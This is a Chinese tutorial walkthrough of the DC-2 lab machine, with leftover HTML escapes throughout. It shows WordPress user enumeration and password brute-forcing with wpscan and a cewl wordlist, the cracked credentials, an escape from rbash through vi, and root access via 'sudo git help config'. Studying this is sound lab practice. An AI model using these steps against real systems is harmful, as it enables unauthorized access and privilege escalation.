DC-2靶机渗透测试完整教学文档<\/h1>

1. 靶机信息收集<\/h2>

1.1 发现靶机IP<\/h3>
使用arp-scan<\/code>工具扫描本地网络，发现DC-2靶机的IP地址：<\/p>
arp-scan -l
<\/span><\/span><\/code><\/pre>发现靶机IP为：192.168.130.138<\/code><\/p>
1.2 端口扫描<\/h3>
使用nmap进行全端口扫描：<\/p>
nmap -A -p1-65535 192.168.130.138
<\/span><\/span><\/code><\/pre>扫描结果显示：<\/p>

80端口：HTTP服务<\/li>
7744端口：SSH服务（非默认22端口）<\/li>
<\/ul>
2. Web服务渗透<\/h2>
2.1 解决域名重定向问题<\/h3>
访问80端口时发现重定向到http:\/\/dc-2\/<\/code>，需要修改本地hosts文件：<\/p>
vi \/etc\/hosts
<\/span><\/span><\/code><\/pre>添加记录：<\/p>
192.168.130.138 dc-2
<\/code><\/pre>
2.2 目录扫描<\/h3>
使用dirsearch工具扫描网站目录：<\/p>
dirsearch -u http:\/\/dc-2\/ -e * -x 403<\/span> 404<\/span>
<\/span><\/span><\/code><\/pre>发现重要文件：wp-login.php<\/code>，表明这是一个WordPress站点。<\/p>
2.3 获取flag1<\/h3>
在网站中发现flag1，提示：<\/p>

常规字典可能无效<\/li>
需要使用cewl工具生成定制字典<\/li>
<\/ul>
2.4 生成密码字典<\/h3>
使用cewl爬取网站内容生成字典：<\/p>
cewl http:\/\/dc-2\/ -w \/home\/zh1yu\/dict.txt
<\/span><\/span><\/code><\/pre>2.5 枚举WordPress用户<\/h3>
使用wpscan枚举用户：<\/p>
wpscan --url dc-2 -e u
<\/span><\/span><\/code><\/pre>发现三个用户：<\/p>

admin<\/li>
jerry<\/li>
tom<\/li>
<\/ul>
2.6 爆破用户密码<\/h3>
使用wpscan进行密码爆破：<\/p>
wpscan --url dc-2 -U \/home\/zh1yu\/ua.txt -P \/home\/zh1yu\/dict.txt
<\/span><\/span><\/code><\/pre>成功获取凭据：<\/p>

jerry: adipiscing<\/li>
tom: parturient<\/li>
<\/ul>
2.7 获取flag2<\/h3>
登录WordPress后台后找到flag2，提示：<\/p>

需要通过其他方式获取shell<\/li>
已尝试80端口，接下来应测试SSH<\/li>
<\/ul>
3. SSH服务渗透<\/h2>
3.1 SSH连接尝试<\/h3>
尝试使用jerry用户连接SSH失败：<\/p>
ssh jerry@192.168.130.138 -p 7744<\/span>
<\/span><\/span><\/code><\/pre>使用tom用户成功连接：<\/p>
ssh tom@192.168.130.138 -p 7744<\/span>
<\/span><\/span><\/code><\/pre>3.2 突破rbash限制<\/h3>
发现连接后处于受限的rbash环境。<\/p>
检查可用命令：<\/p>
echo $PATH
<\/span><\/span>echo \/home\/tom\/usr\/bin\/*
<\/span><\/span><\/code><\/pre>发现可用命令：less、ls、scp和vi<\/p>
使用vi突破限制：<\/p>

在vi中执行：<\/li>
<\/ol>
:set shell=\/bin\/bash
:shell
<\/code><\/pre>

设置环境变量：<\/li>
<\/ol>
export PATH=<\/span>$PATH:\/bin\/
<\/span><\/span>export PATH=<\/span>$PATH:\/usr\/bin
<\/span><\/span><\/code><\/pre>3.3 获取flag3<\/h3>
查找flag文件：<\/p>
cat fl*
<\/span><\/span><\/code><\/pre>提示使用su命令切换用户。<\/p>
3.4 切换到jerry用户<\/h3>
su jerry
<\/span><\/span><\/code><\/pre>输入jerry的密码"adipiscing"后成功切换，在jerry目录下发现flag4。<\/p>
4. 权限提升<\/h2>
4.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现可以以root权限使用git命令。<\/p>
4.2 Git提权<\/h3>
利用git帮助功能提权：<\/p>
sudo git help config
<\/span><\/span><\/code><\/pre>在分页视图中输入：<\/p>
!\/bin\/bash
<\/code><\/pre>
这将启动一个具有root权限的bash shell。<\/p>
4.3 获取最终flag<\/h3>
切换到root目录：<\/p>
cd \/root
<\/span><\/span>ls
<\/span><\/span><\/code><\/pre>找到并查看最终flag文件。<\/p>
5. 总结<\/h2>
本次渗透测试完整流程：<\/p>

网络发现和端口扫描<\/li>
Web服务渗透（WordPress）

目录扫描<\/li>
用户枚举<\/li>
密码爆破<\/li>
<\/ul>
<\/li>
SSH服务利用

突破rbash限制<\/li>
<\/ul>
<\/li>
权限提升

用户切换<\/li>
Git提权<\/li>
<\/ul>
<\/li>
<\/ol>
关键工具：<\/p>

arp-scan<\/li>
nmap<\/li>
dirsearch<\/li>
cewl<\/li>
wpscan<\/li>
vi（用于突破rbash）<\/li>
git（用于提权）<\/li>
<\/ul>